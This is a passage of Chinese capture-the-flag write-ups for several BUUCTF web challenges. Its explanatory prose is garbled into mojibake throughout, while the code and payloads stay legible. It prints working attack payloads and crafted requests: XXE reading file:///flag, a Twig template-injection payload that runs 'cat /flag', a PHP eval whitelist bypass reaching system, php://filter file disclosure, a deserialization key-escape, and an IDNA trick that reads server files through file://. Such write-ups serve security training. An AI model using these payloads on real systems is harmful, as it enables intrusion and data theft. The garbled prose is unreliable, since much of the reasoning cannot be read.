return hashlib.md5(secert_key + param + action).hexdigest()
def md5(content):
return hashlib.md5(content).hexdigest()
def waf(param):
check=param.strip().lower()
if check.startswith("gopher") or check.startswith("file"):
return True
else:
return False
if __name__ == '__main__':
app.debug = False
app.run(host='0.0.0.0',port=80)
ÌáʾÊÇ:flag is in ./flag.txt ,˵Ã÷flagÎļþÊÇflag.txt ¡£Ò»¿ªÊ¼ÊÇtask Àà,ºóÃæ»áÓõ½Õâ¸öÀà¡£ÏÈ¿´Õâ¸ö²¿·Ö:
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)
ÔÚĿ¼geneSign Ŀ¼ÏÂ,·¢ËÍGET ,POST ÇëÇó,´ÓÇëÇóÖÐÌáÈ¡²ÎÊýparam ,È»ºóaction ±»¸³Öµ,×îºóתÏògetSign º¯Êý¡£Õâ¸öº¯Êý»á·µ»Ømd5 ,µ«ÎÒÃÇ·¢ÏÖËü¹¹ÔìµÄmd5 ÓйæÂÉ¿ÉÑ,¶¼ÊÇ°Ñsecert_key + param + action ת»¯³Émd5 ,µ«secert_key ÎÒÃDz»ÖªµÀÊÇʲô¡£
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()
ÔÙ¿´
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
if(waf(param)):
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())
·¢ÏÖÐèÒª´Ócookie ÀïÃæÌáÈ¡action ,sign ,È»ºówaf ÅжÏÊÇ·ñ´¥·¢¹ýÂË»úÖÆ¡£×îºóʵÀý»¯Task Àà,È»ºóÖ´ÐÐexec º¯Êý:
def Exec(self):
result = {}
result['code'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
else:
print(resp)
tmpfile.write(resp)
tmpfile.close()
result['code'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()
if result['code'] == 500:
result['data'] = "Action Error"
else:
result['code'] = 500
result['msg'] = "Sign Error"
return result
µÚÒ»¸öÅжϻáµ÷ÓÃ:
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False
ÎÒÃÇÒªÈÃÕâ¸öº¯Êý·µ»Øtrue ,ËùÒÔÐèÒªÈÃaction ,param ºÏÆðÀ´µÄmd5 Óësign һģһÑù¡£Òò´ËÐèÒªÖªµÀsecert_key + param + action µÄmd5 ,È»ºó´«¸øsign ,ÕâÑù¾Í¿ÉÒÔͨ¹ýÕâ¸öÅжϡ£
¼ÙÉèsecert_key ÊÇxxx ,Ò»¿ªÊ¼·ÃÎÊ/geneSign?param=flag.txt ,·µ»ØµÄmd5 ¾ÍÊÇmd5('xxx' + 'flag.txt' + 'scan') ,ÔÚ python ÀïÃæÉÏÊö±í´ïʽ¾ÍÏ൱ÓÚmd5(xxxflag.txtscan) ¡£µ«task ÀàÀïÈç¹ûÒªµÃµ½flag.txt ÎļþÐèÒªread ×Ö·û´®ÔÚaction ÀïÃæ,ËùÒÔmd5 ÀïÃæÓ¦¸Ã»¹ÒªÓÐread ¡£
ÔٴηÃÎÊ/geneSign?param=flag.txtread ,Äõ½µÄmd5 ¾ÍÊÇmd5('xxx' + 'flag.txtread' + 'scan') ,µÈ¼ÛÓÚ md5('xxxflag.txtreadscan') ¡£
ËüÊä³öµÄmd5 ÖµÓëÖ±½Ó·ÃÎÊ/De1ta?param=flag.txt ¹¹Ôìcookie:action=readscan;sign=7cde191de87fe3ddac26e19acae1525e µÃµ½µÄmd5 ÖµÏàµÈ¡£ÔÚpythonÀïµÄÓï¾ä¶¼ÊÇmd5('xxxflag.txtreadscan') ¡£
References
https://xz.aliyun.com/t/5927
ÊäÈëurl:
/geneSign?param=flag.txtread
ÍøÒ³ÏÔʾ:
9ece1fef99cc22596320b6f27448168b
¹¹ÔìÇëÇó:
GET /De1ta?param=flag.txt HTTP/1.1
Host: 5912f2b9-ba90-4eaf-b521-2e7c2f565054.node3.buuoj.cn
cookie: action=readscan;sign=9ece1fef99cc22596320b6f27448168b
×¢Òâ¿ÕÁ½ÐÐ,µÃµ½flag¡£
todoѧϰ¹þÏ£À©Õ¹¹¥»÷
todo local_file:Èƹý https://xz.aliyun.com/t/6050
References
https://joychou.org/web/hash-length-extension-attack.html
[NCTF2019]Fake XML cookbook
ÕâÒ»ÌâÒªÓõ½XXE(XML External Entity Injection) È«³ÆΪXML ÍⲿʵÌå×¢Èë,XML ²»ÊÇHTML µÄÌæ´ú¡£XML ºÍHTML Ϊ²»Í¬µÄÄ¿µÄ¶øÉè¼Æ:
XML ±»Éè¼ÆÓÃÀ´´«ÊäºÍ´æ´¢Êý¾Ý,Æä½¹µãÊÇÊý¾ÝµÄÄÚÈÝ¡£HTML ±»Éè¼ÆÓÃÀ´ÏÔʾÊý¾Ý,Æä½¹µãÊÇÊý¾ÝµÄÍâ¹Û¡£HTML Ö¼ÔÚÏÔʾÐÅÏ¢,¶øXML Ö¼ÔÚ´«ÊäÐÅÏ¢¡£
ÔÚXML ÀïÃæ,Êý¾Ý·ÅÖÃÔÚʵÌåÀïÃæ,ʵÌå±»Ò»¸ö½Ð×öDTD µÄÓïÒå¹æÔòÔ¼Êø,ÓÃÀ´ËµÃ÷ÄÄЩԪËØ/ÊôÐÔÊǺϷ¨µÄÒÔ¼°ÔªËؼäÓ¦µ±ÔõÑùǶÌ×/½áºÏ¡£XML ÀïÃæʵÌå¿ÉÒÔ±»ÒýÓÃ,¸øʵÌåÈ¡Ãû×Ö,ÔÚÎĵµµÄÆäËûµØ·½Ö±½ÓÒýÓá£ÀýÈç:
<!DOCTYPE note [
<!ENTITY writer "Dawn">
<!ENTITY copyright "Copyright W3School.com.cn">
]>
<test>&writer;?right;</test>
ʹÓÃÄÚ²¿µÄDTD Îļþ,¼´½«Ô¼Êø¹æÔò¶¨ÒåÔÚXML ÎĵµÖÐ,¹æÔòΪ:
<!DOCTYPE ¸ùÔªËØÃû³Æ [ÔªËØÉùÃ÷]>
References
https://xz.aliyun.com/t/6887#toc-5
¹¹ÔìÇëÇó:
POST /doLogin.php HTTP/1.1
Host: 778da916-8c2e-4588-8d6e-11a5f019e8e0.node3.buuoj.cn
X-Requested-With: XMLHttpRequest
Content-Length: 122
<!DOCTYPE xxe [
<!ENTITY flag SYSTEM "file:///flag" >
]>
<user><username>&flag;</username><password>1</password></user>
µÃµ½flag¡£
Ò²¿ÉÒÔд³É:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ENTITY flag SYSTEM "file:///flag" >
]>
<user><username>&flag;</username><password>1</password></user>
<?xml version="1.0" encoding="utf-8"?> ³ÆΪXML prolog ,ÓÃÓÚÉùÃ÷XML ÎĵµµÄ°æ±¾ºÍ±àÂë,ÊÇ¿ÉÑ¡µÄ,±ØÐë·ÅÔÚÎĵµ¿ªÍ·¡£
References
https://blog.csdn.net/SopRomeo/article/details/105913611
[ASIS 2019]Unicorn shop
´ò¿ªÍøÒ³,°´F12,·¢ÏÖ×¢ÊÍ:
<meta charset="utf-8">
˵Ã÷±¾ÌâÊÇ×Ö·ûÏà¹ØµÄ֪ʶµã¡£¿¼ÂÇutf-8±àÂëµÄת»»°²È«ÎÊÌâ¡£
References
https://xz.aliyun.com/t/5402
µ±¹ºÂòµÚËļþÉÌƷʱ,Ò³ÃæÌáʾ:
Only one char(?) allowed!
µ«1337ÓÐËĸö×Ö·û,ËùÒÔÎÒÃÇ¿¼ÂÇÓÐûÓÐÒ»¸ö×Ö·û¿ÉÒÔ±íʾһÍò»òÕ߸ü´óµÄÊý,Ö»Òª±ÈµÚËļþÉÌÆ·µÄ¼Û¸ñ¸ß¾ÍÐÐÁË¡£ÓÚÊÇÎÒÃÇÕÒµ½ÁËÂÞÂíÊý×ÖµÄÒ»Íò? ,Ëü¶ÔÓ¦µÄutf-8±àÂëÊÇE2 86 82,Òò´ËÔÚÍøÕ¾ÊäÈë:
%E2%86%82
µÃµ½flag¡£
References
https://unicode-table.com/cn/2182/
https://blog.csdn.net/SopRomeo/article/details/105465756
[BJDCTF2020]Cookie is so stable
´ò¿ªÍøÒ³,µã»÷hintÒ³Ãæ,°´F12,·¢ÏÖ×¢ÊÍ:
˵Ã÷cookiesÊǽâÌâµÄ¹Ø¼ü¡£²é¿´ÍøÒ³µÄcookies:
cd59048e3172da4d60685556df9ccf9b
ÔÚÌá½»idÒ³ÃæÀ¹½ØÊý¾Ý°ü,·¢ÏÖcookiesûÓб»Ð޸ġ£
POST /flag.php HTTP/1.1
Host: a85606d6-0af3-479e-8a7c-05a7a9b11acb.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=cd59048e3172da4d60685556df9ccf9b
Connection: close
Content-Length: 24
username=1&submit=submit
ÐÞ¸Äuesrnameºó·¢ÏÖûÓÃ,³¢ÊÔÌá½»id²»À¹½Ø,ÊäÈë1ºó,ÍøÒ³ÏÔʾhello 1,Ë¢ÐÂÍøҳʱÀ¹½Ø:
GET /flag.php HTTP/1.1
Host: a85606d6-0af3-479e-8a7c-05a7a9b11acb.node3.buuoj.cn
Cookie: PHPSESSID=cd59048e3172da4d60685556df9ccf9b; user=1
×¢Òâ¿ÕÁ½ÐС£ÕâʱÐÞ¸Äuser,ÍøÒ³ÄÚÈݾͻáËæÖ®¸Ä±ä,˵Ã÷Õâ¾ÍÊÇ×¢Èëµã¡£ÏÈÈ·¶¨ÊÇÄĸöÄ£°åµÄ×¢Èë: 
È·¶¨ÄĸöÄ£°åµÄ×¢ÈëµÄÒ»°ãÁ÷³Ì:
- ÔÚÒÉËƵĵط½ÊäÈë
${7*7} ,Èç¹ûÓнá¹û(49) - ¼ÌÐøÊäÈë
a{*comment*}b ,³É¹¦ÔòÊÇsmartyÒýÇæ ,ÒÔ´ËÀàÍÆ
ÓÐЩʱºò²»Í¬µÄÄ£°åÒýÇæ¶ÔͬһÊäÈë{{7*'7'}} ¶¼Óнá¹û
µ«ÊÇÔÚTwig Öнá¹ûÊÇ49,ÔÚjinja2 ÖÐÊÇ7777777 ¡£
References
https://zhuanlan.zhihu.com/p/28823933
https://my.oschina.net/u/4588149/blog/4408349
½«userÖµ¸ÄΪ{{7*'7'}} ·¢ÏÖÍøÒ³ÏÔʾÊÇ49,ËùÒÔÈ·¶¨ÊÇTwig Ä£°å¡£Ò»¸öÕë¶ÔTwig µÄ¹¥»÷ÔغÉ:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
¹¹ÔìÇëÇó:
GET /flag.php HTTP/1.1
Host: a85606d6-0af3-479e-8a7c-05a7a9b11acb.node3.buuoj.cn
Cookie: PHPSESSID=cd59048e3172da4d60685556df9ccf9b; user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
ÍøÒ³ÏÔʾflag,×¢ÒâʹÓÃBurp SuiteʱcookiesÏÂÃæ¿ÕÁ½ÐС£
¸÷ÖÖÄ£°åµÄtags:  References
https://www.cnblogs.com/bmjoker/p/13508538.html
https://my.oschina.net/u/4588149/blog/4408349
https://www.cnblogs.com/wkzb/p/12422190.html
https://zhuanlan.zhihu.com/p/28823933
https://www.k0rz3n.com/2018/11/12/һƪÎÄÕ´øÄãÀí½â©¶´Ö®SSTI©¶´/#2-Twig
https://www.cnblogs.com/wangtanzhi/p/12330542.html
[CISCN 2019 ³õÈü]Love Math
´ò¿ªÍøÒ³,·¢ÏÖÔ´´úÂë:
<?php
error_reporting(0);
if(!isset($_GET['c'])){
show_source(__FILE__);
}else{
$content = $_GET['c'];
if (strlen($content) >= 80) {
die("Ì«³¤Á˲»»áËã");
}
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("Çë²»ÒªÊäÈëÆæÆæ¹Ö¹ÖµÄ×Ö·û");
}
}
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("Çë²»ÒªÊäÈëÆæÆæ¹Ö¹ÖµÄº¯Êý");
}
}
eval('echo '.$content.';');
}
Èç¹ûûÓйýÂË,GETÇëÇóΪ:
/?c=system("cat /flag")
¾¹ý²âÊÔ/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/ Ö»»áÆ¥ÅäÎı¾ÄÚµÚÒ»¸öµ¥´Ê,ÇÒµ¥´Ê±ØÐëÊÇ°×Ãûµ¥ÀïÃæµÄ¡£
GETÇëÇóΪ:
/?c=($_GET[a])($_GET[b])&a=system&b=cat /flag
×îºóÊäÈëurl:
/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag
todoΪʲôcat /flag¿ÉÒÔ¼ì²â³ö¿Õ¸ñ µ«Ã»ÓÐÊä³ö:Çë²»ÒªÊäÈëÆæÆæ¹Ö¹ÖµÄ×Ö·û
References
https://cloud.tencent.com/developer/article/1600943
»òÕß
/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac /flag
References
https://www.cnblogs.com/wangtanzhi/p/12246731.html
todo Õâ¸öÁ´½ÓºÜ¶à¶¼²»³É¹¦
[BSidesCF 2020]Had a bad day
½øÈëÍøÒ³,·¢ÏÖÁ½¸ö°´Å¥¡£µãÆäÖÐÒ»¸ö°´Å¥ºó,¹Û²ìµ½ÍøÒ³urlÊÇ:
http://43f9c4eb-7b6c-405e-9dd6-2ce954420f83.node3.buuoj.cn/index.php?category=woofers
¿¼ÂÇÓÃαÐÒé:
/index.php?category=php://filter/read=convert.base64-encode/resource=index.php
±¨´íÐÅÏ¢:
Warning: include(php://filter/read=convert.base64-encode/resource=index.php.php): failed to open stream: operation failed in /var/www/html/index.php on line 37
·¢ÏÖ³ÌÐò×Ô¶¯¼ÓÁ˺ó׺,ËùÒÔurlÐÞ¸ÄΪ:
/index.php?category=php://filter/read=convert.base64-encode/resource=index
·¢ÏÖbase64 ±àÂë,½âÂëºó:
<?php
$file = $_GET['category'];
if(isset($file)) {
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")) {
include ($file . '.php');
} else {
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
˵Ã÷url±ØÐë°üº¬woofers ,meowers ,index ÕâÈý¸ö´ÊµÄÆäÖÐÒ»¸ö¡£
ÊäÈëurl:
/index.php?category=php://filter/convert.base64-encode/index/resource=flag
µÃµ½base64 ±àÂë,½âÂëºó·¢ÏÖflag ¡£index ·ÅÖмä,php ½âÎöʱ»á×Ô¶¯ºöÂÔËü²»ÈÏʶµÄµ¥´Ê¡£
»òÕß:
/index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag
αÐÒéµÄÐÒéÖÐÖ¸¶¨ÁËÌض¨µÄÐÒé¼ü,ʶ±ðµ½woofers ʱ²»ÈÏʶ»áºöÂÔµô¡£
References
https://blog.csdn.net/EC_Carrot/article/details/111245747
/index.php?category=php://filter/index/convert.base64-encode/resource=flag
References
https://c0okb.github.io/2020/04/13/BSidesCF-web/#BSidesCF-2020-Had-a-bad-day
https://zhuanlan.zhihu.com/p/49206578
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
[°²ä± 2019]easy_serialize_php
´ò¿ªÍøÒ³,µã»÷Á´½Ó,ÏÔʾԴ´úÂë:
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();');
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
ÊäÈëurl:
/index.php?f=phpinfo
·¢ÏÖ:
auto_append_file d0g3_f1ag.php
˵Ã÷ÐèÒª¶ÁÈ¡d0g3_f1ag.php ¡£
extract($_POST); ˵Ã÷ҪʹÓÃPOST µÄ·½·¨Ìá½»Êý¾Ý,extract($_POST) »á½«POST µÄÊý¾ÝÖеļüÃûºÍ¼üֵת»»ÎªÏàÓ¦µÄ±äÁ¿ÃûºÍ±äÁ¿Öµextract() ¿ÉÒÔ½øÐбäÁ¿¸²¸Ç,µ±ÎÒÃÇ´«ÈëSESSION[flag]=123 ʱ,$SESSION["user"] ºÍ$SESSION['function'] È«²¿»áÏûʧ¡£
ÔÚ±¾µØ´´½¨php ÍøÒ³index.php Ϊ:
<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
var_dump($_SESSION);
extract($_POST);
var_dump($_SESSION);
?>
¹¹ÔìÇëÇó:
POST /index.php HTTP/1.1
Host: 10.50.36.45
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
_SESSION[flag]=123
10.50.36.45 ÊDZ¾»úipv4 µØÖ·,Çë×ÔÐÐÉèÖÃ,ΪÁËÄÜÈÃburp SuiteÀ¹½Øµ½,²»ÄÜʹÓÃlocalhost ·ÃÎÊ¡£ÏìÓ¦:
array(2) {
["user"]=>
string(5) "guest"
["function"]=>
NULL
}
array(1) {
["flag"]=>
string(3) "123"
}
ֻʣÏÂ_SESSION[flag]=123 ¡£²»·¢ËÍPOST ÇëÇóʱ,¹¹ÔìÇëÇó:
POST /index.php HTTP/1.1
Host: 10.50.36.45
ÏìÓ¦:
array(2) {
["user"]=>
string(5) "guest"
["function"]=>
NULL
}
array(2) {
["user"]=>
string(5) "guest"
["function"]=>
NULL
}
¿É¼ûextract() ¿ÉÒÔ½øÐбäÁ¿¸²¸Ç¡£
References
https://crayon-xin.github.io/2018/05/21/extract±äÁ¿¸²¸Ç/
¼ÌÐøÔĶÁÔ´´úÂë:
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
ûÓÐÈκÎÒÑÖª×Ö·û´®¾¹ýsha1 ¼ÓÃܺóÔÙbase64 ½âÂëÊÇd0g3_f1ag.php ,ËùÒÔ²»ÄÜÖ±½ÓÓñäÁ¿¸²¸Ç¸ø$_SESSION['img'] ¸³Öµ,Ô´´úÂë×îºóÒ»²½ÊÇ:
echo file_get_contents(base64_decode($userinfo['img']));
Èç¹ûÖ±½Ó±äÁ¿¸²¸ÇÕâÒ»²½²»¿ÉÄܳɹ¦¡£
¼ÌÐøÔĶÁÔ´´úÂë:
$serialize_info = filter(serialize($_SESSION));
Ïëµ½¿¼ÂÇ·´ÐòÁл¯Â©¶´:¼üÖµÌÓÒÝ¡£±¾À´Í¦ºÃµÄÐòÁл¯µÄ×Ö·û´®,°´ÕÕ¹ýÂ˹æÔòÈ¥µôÁËһЩ¹Ø¼ü×Ö,´ËʱÐòÁл¯¸ñʽ¾Í»á´íÂÒ,Éæ¼°µ½¿ÉÄÜÆÆ»µÔÓнṹ¶øÎÞ·¨Õý³£·´ÐòÁл¯µÄÎÊÌâ¡£ÕâÀïÊÇÀûÓ÷´ÐòÁл¯³¤¶ÈÌÓÒÝ¿ØÖÆÁËimg ²ÎÊý¡£Ò²ÓÐÒ»µÀÌâÄ¿Êǹؼü×ÖÌæ»»µ¼ÖÂ×Ö·û´®³¤¶È±ä³¤,°ÑºóÃæµÄÔÓвÎÊý¼·³öÈ¥ÁË,±¾ÌâÊǹؼü×Ö±»Öÿյ¼Ö³¤¶È±ä¶Ì,ºóÃæµÄÖµµÄµ¥ÒýºÅ±ÕºÏÁËÇ°ÃæµÄÖµµÄµ¥ÒýºÅ,µ¼ÖÂһЩÄÚÈÝÌÓÒÝ¡£
References
https://www.cnblogs.com/wangtanzhi/p/12261610.html
¶ÁÈ¡d0g3_f1ag.php ,base64±àÂëºóÊÇZ3Vlc3RfaW1nLnBuZw== ¡£
<?php
$_SESSION["phpflag"]=';s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION["img"]='Z3Vlc3RfaW1nLnBuZw==';
echo serialize($_SESSION);
?>
ÐòÁл¯Ö®ºó½á¹ûΪ:
a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
¼üÓóÈÉ«±íʾ,ÖµÓÃÂÌÉ«±íʾ¡£¾¹ýfilter ¹ýÂ˺ó,phpflag ±»¹ýÂË,preg_replace ĬÈÏÊǽøÐÐÎÞÏÞ´ÎÌæ»»,Ö±µ½ÎÞ·¨Æ¥ÅäÕýÔò¡£
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
Ìæ»»µôÖ®ºó³ÈÉ«ÊÇеļü,ÂÌÉ«ÊÇеÄÖµ,ºìÉ«²¿·Ö»á±»×Ô¶¯¶ªÆúµô,ÒòΪ¿ªÊ¼µÄa:2 ±íʾֻÓÐÁ½¸ö¼üÖµ¶Ô,È«²¿Æ¥ÅäÍêºó,ºóÃæµÄÄÚÈÝ»á×Ô¶¯ºöÂÔ¡£ÕâÑù$_SESSION['img'] µÄÖµ¾Í±»Ìæ»»³ÉÁËd0g3_f1ag.php µÄbase64 ±àÂ롣ȷÈÏÕâÑù¿ÉÒÔÕýÈ·ÏÔʾd0g3_f1ag.php ºó,¹¹ÔìÇëÇó:
_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
Ò³ÃæÏÔʾΪ:
<?php
$flag = 'flag in /d0g3_fllllllag';
?>
˵Ã÷flagÔÚ/d0g3_fllllllag ÀïÃæ¡£/d0g3_fllllllag µÄbase64 ±àÂë¸ÕºÃÒ²ÊÇ20λ,ÐÞ¸ÄPOST Êý¾Ý:
_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
µÃµ½flag¡£
References
https://www.jianshu.com/p/8e8117f9fd0e
https://www.cnblogs.com/wangtanzhi/p/12261610.html
[SUCTF 2019]Pythonginx
´ò¿ªÍøÒ³,°´F12 ,·¢ÏÖpython´úÂë:
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "ÎÒÞÐ your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "ÎÒÞÐ your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "ÎÒÞÐ your problem? 333"
»¹ÓÐ×¢ÊÍ:
Ìáµ½ÁËnginx ,¶ønginx ÅäÖÃÎļþĿ¼ÊÇ:
/usr/local/nginx/conf/nginx.conf
ËùÒÔ,¿ÉÄÜÐèÒª¶ÁÈ¡nginx µÄÅäÖÃÎļþ¡£½âÌâµÄ¹Ø¼üÊÇÇ°Á½¸öÅжÏhost ÀïÃæ²»ÄÜÓÐsuctf.cc ,×îºóÒ»¸öÅжÏÀïÃæÒªÓÐsuctf.cc ¡£
newhost.append(h.encode('idna').decode('utf-8'))
²»Ã÷°×idna ÊÇʲô,¿ÉÒÔʹÓÃËÑË÷ÒýÇæ,·¢ÏÖ×Ö·ûת»»Â©¶´¡£¹ú¼Ê»¯ÓòÃû(Internationalized Domain Name,IDN)ÓÖÃûÌØÊâ×Ö·ûÓòÃû,ÊÇÖ¸²¿·Ö»òÍêȫʹÓÃÌØÊâÎÄ×Ö»ò×Öĸ×é³ÉµÄ»¥ÁªÍøÓòÃû,°üÀ¨ÖÐÎÄ¡¢·¢Óý¡¢°¢À²®Óϣ²®À´Óï»òÀ¶¡×ÖĸµÈ·ÇÓ¢ÎÄ×Öĸ,ÕâЩÎÄ×Ö¾¹ý¶à×Ö½ÚÍò¹úÂë±àÂë¶ø³É¡£ÔÚÓòÃûϵͳÖÐ,¹ú¼Ê»¯ÓòÃûʹÓÃpunycode תд²¢ÒÔASCII ×Ö·û´®´æ´¢¡£
IDNA (Internationalizing Domain Names in Applications)ÊÇÒ»ÖÖÒÔ±ê×¼·½Ê½´¦ÀíASCII ÒÔÍâ×Ö·ûµÄÒ»ÖÖ»úÖÆ,Ëü´Óunicode ÖÐÌáÈ¡×Ö·û,²¢ÔÊÐí·ÇASCII Âë×Ö·ûÒÔÔÊÐíʹÓõÄASCII ×Ö·û±íʾ¡£
unicode תASCII ·¢ÉúÔÚIDNA ÖеÄTOASCII ²Ù×÷ÖС£Èç¹ûÄÜͨ¹ýTOASCII ת»»Ê±,½«»áÒÔÕý³£µÄ×Ö·û³ÊÏÖ¡£¶øÈç¹û²»ÄÜͨ¹ýTOASCII ת»»Ê±,¾Í»áʹÓÃACE±êÇ© ,ACE ±êǩʹÊäÈëµÄÓòÃûÄÜת»¯ÎªASCII Âë
unicode µÄ¹æ·¶»¯¸ñʽÓм¸ÖÖ,ÿÖֵĴ¦Àí·½Ê½ÓÐЩ²»Ò»Ñù¡£
- NFC
Unicode ¹æ·¶»¯¸ñʽ C¡£Èç¹ûδָ¶¨ normalization-type ,ÄÇô»áÖ´ÐÐ Unicode ¹æ·¶»¯¡£ - NFD
Unicode ¹æ·¶»¯¸ñʽ D - NFKC
Unicode ¹æ·¶»¯¸ñʽ KC - NFKD
Unicode ¹æ·¶»¯¸ñʽ KD
? Õâ¸ö×Ö·ûʹÓÃpython3½øÐÐidna ±àÂë:
print('?'.encode('idna'))
½á¹û
b'c/u'
Èç¹ûÔÙʹÓÃutf-8 ½øÐнâÂë:
print(b'c/u'.decode('utf-8'))
½á¹û
c/u
References
https://xz.aliyun.com/t/6135
https://xz.aliyun.com/t/6070
ʹÓÃpython½Å±¾ËÑË÷ÄÄЩunicode ±àÂë·ûºÏÒªÇó:
from urllib.parse import urlparse,urlunsplit,urlsplit
def get_unicode():
for x in range(65536):
uni=chr(x)
url="http://suctf.c{}".format(uni)
try:
if getUrl(url):
print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
except:
pass
def getUrl(url):
url = url
host = urlparse(url).hostname
if host == 'suctf.cc':
return False
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return False
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
finalUrl = urlunsplit(parts).split(' ')[0]
host = urlparse(finalUrl).hostname
if host == 'suctf.cc':
return True
else:
return False
if __name__=="__main__":
get_unicode()
ÔËÐнá¹û:
str: ? unicode: \u2102
str: ¨G unicode: \u2105
str: ? unicode: \u2106
str: ? unicode: \u212d
str: ? unicode: \u216d
str: ? unicode: \u217d
str: ? unicode: \u24b8
str: ? unicode: \u24d2
str: C unicode: \uff23
str: c unicode: \uff43
References
ÓòÃûת»»¾ßÌå¹ý³Ì https://xz.aliyun.com/t/6070
https://www.codenong.com/cs109743728/
https://xz.aliyun.com/t/6042#toc-24
ÒÔÉÏ×Ö·û,¶¼»áÔÚ
newhost.append(h.encode('idna').decode('utf-8'))
Ö®ºóת»»³Ésuctf.cc ,ͨ¹ý×îºóÒ»¸öif ÅжÏ,²¢·ÃÎÊ:
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
Òò´ËÔÚµØÖ·À¸ÊäÈëurl,¶ÁÈ¡nginx ÅäÖÃÎļþµÄÄÚÈÝ:
/getUrl?url=file://suctf.c?sr/local/nginx/conf/nginx.conf
×îºóµÄfinalUrl ·ÃÎÊÁ´½Ó±ä³É:
file://suctf.cc/usr/local/nginx/conf/nginx.conf
ÍøÒ³ÏÔʾ:
server {
listen 80;
location / {
try_files $uri @app;
}
location @app {
include uwsgi_params;
uwsgi_pass unix:///tmp/uwsgi.sock;
}
location /static {
alias /app/static;
}
# location /flag {
# alias /usr/fffffflag;
# }
}
·¢ÏÖflag·¾¶Îª/usr/fffffflag ,ÔÙ´ÎÔÚµØÖ·À¸ÊäÈëurl:
/getUrl?url=file://suctf.c?sr/fffffflag
µÃµ½flag¡£
